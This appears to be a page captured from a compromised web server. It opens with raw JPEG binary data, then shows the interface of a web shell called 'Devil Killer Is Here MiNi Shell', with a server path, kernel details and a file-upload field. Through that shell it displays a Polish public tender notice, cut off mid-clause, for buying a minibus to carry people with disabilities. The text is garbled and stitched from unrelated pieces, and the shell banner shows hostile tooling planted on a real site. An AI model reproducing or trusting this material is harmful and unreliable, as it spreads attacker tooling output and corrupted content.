JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240903/0048172601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup mikrobusa do przewozu osób z niepełnosprawnościami do WTZ Wiechlice w ramach Programu wyrównywania różnic między regionami III </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZPROTAWSKIE STOWARZYSZENIE OSÓB NIEPEŁNOSPRAWNYCH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970701504</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">JESIONOWA 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wiechlice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">502740134</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wtz11@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wtz.szprotawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Działanie na rzecz osób niepełnosprawnych </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działanie na rzecz osób niepełnosprawnych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup mikrobusa do przewozu osób z niepełnosprawnościami do WTZ Wiechlice w ramach Programu wyrównywania różnic między regionami III </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-92582c42-ca3c-459b-b689-0ea21b9fc551</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00481726</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-92582c42-ca3c-459b-b689-0ea21b9fc551 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Stały dostęp do sieci internetowej, włączona obsługa JavaScript, zainstalowana dowolna przegladarka</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zawarto w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zawarto w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SSON.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 160975,61 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa 1 sztuki fabrycznie nowego samochodu typu minibus przystosowanego do przewozu osób z niepełnosprawnościami<br/>Wymagania ogólne<br/>1. Pojazd fabrycznie nowy<br/>2. Rok produkcji: 2024 r.<br/>3. Homologacja umożliwiająca rejestrację pojazdu na terenie Polski<br/>4. zabudowa do przewozu wózka inwalidzkiego<br/><br/>Parametry techniczne:<br/>1. Nadwozie typu: minibus/mikrobus<br/>2. Wymiary: <br/>•	Długość samochodu – maksymalna 5450 mm<br/>•	Szerokość z lusterkami – maksymalna 2275 mm<br/>•	Wysokość całkowita – maksymalna 1961-1978 mm<br/>3. Boczne drzwi przesuwane z prawej strony <br/>4. Tylne drzwi z oknem dwustronne, szyba ogrzewana z wycieraczką<br/>5. Liczba miejsc w samochodzie: 9 <br/>- układ siedzeń 3+3+3 tj. 1+8 (kierowca + 8 pasażerów) w układzie: <br/>•	1 rząd – kierowca + 2 pasażerów, regulacja manualna fotela kierowcy w 4 kierunkach, regulacja odcinka lędźwiowego kierowcy,<br/>•	2 rząd – 3 pasażerów – siedzenie od strony przesuwnych drzwi podnoszone lub składane w sposób umożliwiający wsiadanie pasażerom na 3 rzędzie,<br/>•	3 rząd – 3 pasażerów – składany i wyjmowany z możliwością zwiększenia przestrzeni ładunkowej lub kanapa w trzecim rzędzie siedzeń,<br/>6. Tapicerka ciemna materiałowa<br/>7. Kabina pasażerska przeszklona. <br/>8. Kolor nadwozia – bez znaczenia<br/>9. Wszystkie szyby termoizolacyjne, przyciemniane w części pasażerskiej i z tyłu.<br/>10. Dopuszczalna masa całkowita umożliwiająca prowadzenie pojazdu na podstawie uprawnień prawa jazdy kat. B<br/><br/>Silnik<br/>1. Rodzaj paliwa: olej napędowy<br/>2. Pojemność silnika od 1 900 cm3 do 2400 cm3<br/>3. Moc silnika minimum: 130 KM<br/>4. Norma emisji spalin minimum EURO 6 <br/>Dopuszczalna emisja zanieczyszczeń, tlenków azotu, cząstek stałych oraz węglowodorów spełniająca wymogi minimum dla Europejskiego standardu Emisji Spalin Euro 6d-ISC-FCM<br/>5. Zbiornik paliwa minimum 50 l<br/>6. Zbiornik paliwa SSI<br/>7. Zbiornik płynu adblue 20I<br/>8. Zużycie paliwa w cyklu mieszanym wg WLTP – w przedziale 7,0 l do 9,0 l/100km<br/>9.Wartość uśredniona emisji dwutlenku węgla w cyklu mieszanym – do 210 g/km<br/><br/>Bezpieczeństwo i technologia<br/>1. Czujniki parkowania - przód <br/>2. Czujniki parkowania - tył<br/>3. Elektryczny układ wspomagania kierownicy (EPAS)<br/>4. Hamulce - system stabilizacji toru jazdy przyczepy TSC, układ ułatwiający ruszanie na wzniesieniach, elektroniczny system stabilizacji toru jazdy (ESC), system kontroli trakcji i system ABS <br/>5. Inteligentny ogranicznik prędkości, <br/>6. Kamera cofania,<br/>7. Komputer pokładowy - zasięg na paliwie w zbiorniku, chwilowe i średnie zużycie paliwa, średnia prędkość, temperatura zewnętrzna,<br/>8. Lusterka boczne - elektrycznie sterowane i podgrzewane,<br/>9. Monitor stanu pojazdu - system informacji dla kierowcy,<br/>10. Możliwość wyboru trybu jazdy,<br/>11. Podgrzewana przednia szyba, <br/>12. Poduszka powietrzna kierowcy,<br/>13. Poduszka powietrzna - pasażera z przodu (obejmuje wyłącznik poduszki powietrznej pasażera),<br/>14. Poduszki powietrzne boczne, kurtyny powietrzne,<br/>15. System kontroli pasa ruchu,<br/>16.System monitorowania ciśnienia w oponach, <br/>17. System rozpoznawania znaków ograniczenia prędkośc,i<br/>18. System tankowania bez korka wlewu z zabezpieczeniem przed wlaniem niewłaściwego paliwa <br/>19. System zapobiegający kolizjom (kamera) z asystentem skrętu w lewo<br/>20. Szyby - elektrycznie sterowane szyby przednich drzwi z funkcją otwierania szyby po stronie kierowcy jednym naciśnięciem przycisku,<br/>21. Tempomat<br/>22. Układ ułatwiający ruszanie pod górę (HSA)<br/>23. Wycieraczki - automatyczne z czujnikiem deszczu<br/><br/>Systemy audio i komunikacji<br/>- radio cyfrowe DAB, ekran dotykowy 13&#34;, modem, zestaw głośnomówiący Biuetooth® oraz 10 głośników <br/><br/><br/>Skrzynia biegów<br/>1. Manualna 6 biegów w przód + 1 bieg w tył<br/>2. Formowany uchwyt dźwigni zmiany biegów<br/><br/>Układ przeniesienia napędu <br/>Stały napęd na przód lub tył.<br/><br/>Układ hamulcowy: <br/>1.	hydrauliczny, dwuobwodowy ze wspomaganiem,<br/>2.	korektor siły hamowania, <br/>3.	hamulce tarczowe wentylowane z przodu i z tyłu, <br/> <br/>Układ kierowniczy: <br/>1.	wspomaganie układu kierowniczego, <br/>2.	kierownica z przodu pojazdu po lewej stronie, <br/>3.	kolumna kierownicy regulowana w dwóch płaszczyznach,<br/>4.	Kierownica – poliuretanowa<br/><br/>Koła/opony: <br/>1.	pełnowymiarowe koło zapasowe, <br/><br/>Komfort<br/>1. Formowany uchwyt dźwigni zmiany biegów <br/>2. Klimatyzacja - z przodu pojazdu, z automatyczną regulacją temperatury <br/>3. Mała konsola dachowa <br/>4. Mała konsola środkowa<br/>5. Ogrzewanie z recyrkulacją powietrza <br/>6. Oświetlenie w kabinie - lampki do czytania w podsufitce<br/>7. Oświetlenie wnętrza - oświetlenie wnętrza w tylnej części pojazdu z lampkami do czytania <br/>8. Pojedyncze gniazdo USB z tyłu<br/>9. Uchwyt na kubki - podwójny, zamontowany w desce rozdzielczej <br/>10. Wykładzina gumowa na podłodze<br/>11. Klimatyzacja w tylnej części pojazdu<br/><br/>Zabezpieczenia<br/>1. Immobilizer <br/>2. Zamki drzwi - konfiguracja odryglowywania nr 2 (1x naciśnięcie - drzwi kierowcy, pasażera i boczne drzwi przesuwne; 2x naciśnięcie - wszystkie drzwi)<br/>3. Zamki drzwi - ochrona przed zatrzaśnięciem kluczyka<br/>4. Zamki drzwi - z centralnym zamykaniem<br/>5. Zamki drzwi - zdalne sterowanie centralnego zamka z 2 pilotami<br/><br/>Przestrzeń ładunkowa<br/>1. Brak przegrody<br/>2. Oświetlenie przestrzeni ładunkowej LED<br/>3. Panele zabezpieczające ściany i drzwi przedziału ładunkowego - do połowy wysokości<br/>- Przestrzeń ładunkowa-4 zaczepy mocowania ładunku zgodnych z normą DIN 75410 <br/>4. Zestaw do naprawy opon<br/><br/>Wygląd zewnętrzny <br/>1. Chlapacze przednie, <br/>2. Chlapacze tylne,<br/>3. Drzwi - boczne drzwi przesuwne - po prawej stronie,<br/>4. Drzwi tylne - dwuskrzydłowe z szybami, kąt otwarcia 168o z blokadą przy 90o,<br/>5. Lusterka boczne - obudowy w kolorze czarnym,<br/>6. Nadwozie-dach niski H1,<br/>7. Okna boczne w drugim rzędzie po lewej, szyby stałe,<br/>8. Okna boczne w drugim rzędzie po prawej, szyby stałe,<br/>9. Okna boczne w trzecim rzędzie po lewej, szyby stałe,<br/>10. Okna boczne w trzecim rzędzie po prawej, szyby stałe,<br/>11. Przedni zderzak - częściowo w kolorze nadwozia (nakładki zderzaka),<br/>12. Reflektory - automatyczna zmiana świateł drogowych na mijania,<br/>13. Reflektory - automatyczne włączanie,<br/>14. Reflektory - LED dla świateł mijania, halogenowe dla świateł drogowych Reflektory - światła do jazdy dziennej, 16. Światła tylne halogenowe,<br/>15. Tylny zderzak - częściowo w kolorze nadwozia (nakładki zderzaka),<br/>16. Ciemne szyby w tylnej części pojazdu<br/><br/>Gwarancja<br/>1. Okres gwarancji mechanicznej: co najmniej 24 m-ce bez limitu kilometrów.<br/>2. Okres gwarancji na powłoki lakiernicze: co najmniej 36 m-cy.<br/>3. Okres gwarancji na perforację nadwozia: co najmniej 72 m-ce.<br/>4. Sieć autoryzowanych stacji obsługi (ASO) na terenie całej Polski – co najmniej 1 stacja w każdym województwie lub w innym województwie w odległości nie więcej niż 150 km od siedziby Zamawiającego. <br/><br/>Wraz z pojazdem należy dostarczyć<br/>1. Instrukcję obsługi w języku polskim<br/>2. Książkę gwarancyjną wraz ze szczegółowymi warunkami gwarancji i serwisu<br/>3. Książkę przeglądów serwisowych<br/>4. Gaśnicę<br/>5. Trójkąt ostrzegawczy<br/>6. Podnośnik<br/>7. Komplet kluczy<br/>8. Kamizelkę odblaskową<br/>9. Apteczkę<br/>Dostarczony samochód musi spełniać wymagania przepisów prawa obowiązujących na terenie Rzeczypospolitej Polskiej w zakresie dopuszczenia pojazdów do ruchu drogowego.<br/>Samochód musi spełniać polskie i europejskie wymogi w zakresie bezpieczeństwa oraz wymagania poruszania się po drogach publicznych, zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym (Dz.U. z 2021 r. poz. 450 z późn. zm.)<br/>Samochód musi posiadać homologację wystawioną zgodnie z przepisami Rozdziału 1a ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym z 2021 r. poz. 450 z późn. zm.). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34115200-8 - Pojazdy silnikowe do transportu mniej niż 10 osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34110000-1 - Samochody osobowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty za kryterium „Cena” (C) zostaną obliczone według wzoru: <br/>Cena oferty najtańszej <br/>------------------------------- x 80% = liczba punktów <br/>Cena oferty badanej<br/><br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku. <br/><br/>Kryterium Termin płatności faktury (F)<br/>Kryterium zostanie ocenione na podstawie wskazanego przez Wykonawcę w ofercie terminu płatności faktury od dostarczenia jej Zamawiającemu, przy czym termin ten nie może być krótszy niż 14 dni, następująco:<br/>Liczba punktów<br/>powyżej 21 dni – 20 pkt <br/>od 15 do 21 dni 5 pkt <br/>14 dni – 0 pkt <br/><br/>Oferta w tym kryterium może otrzymać maksymalnie 20 punktów.<br/>W przypadku niewskazania przez Wykonawcę w ofercie terminu płatności faktury, Zamawiający przyjmie, że termin ten wynosi 14 dni i przyzna ofercie 0 punktów w tym kryterium oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>zdolności technicznej lub zawodowej<br/>Wykonawca spełni ww. warunek jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonywał minimum dwie dostawy polegające na dostawie samochodów osobowych typu BUS do przewozu osób o wartości minimum 100 000,00 zł brutto każda, wraz z podaniem ich wartości, daty i miejsca wykonania oraz podmiotów na rzecz których dostawa została wykonana oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonywał minimum dwie dostawy samochodów osobowych typu BUS do przewozu osób o wartości minimum 100 000,00 zł brutto każda, wraz z podaniem ich wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których dostawa została wykonana oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 4. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści oświadczenia, o którym mowa w art. 125 ust.1, lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w postępowaniu.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość istotnych zmian postanowień Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:<br/>a) zmiana terminu realizacji przedmiotu Umowy - przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością dotrzymania terminów wynikających z umowy;<br/>b) zmiana obowiązującej stawki VAT - jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę,<br/>c) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy<br/>2. Na skutek zmian przepisów prawnych;<br/>a) zmiany uzasadnione okolicznościami, o których mowa w art. 3571 Kodeksu cywilnego z uwzględnieniem faktu, że za rażącą zostanie uznana strata w wysokości, o której mowa w art. 397 kodeksu spółek handlowych.<br/>3. Zmiany w umowie, stosownie do postanowień ust. 1, będą dokonywane po uzgodnieniu ich zakresu i warunków przez Strony w drodze pisemnego aneksu do umowy pod rygorem 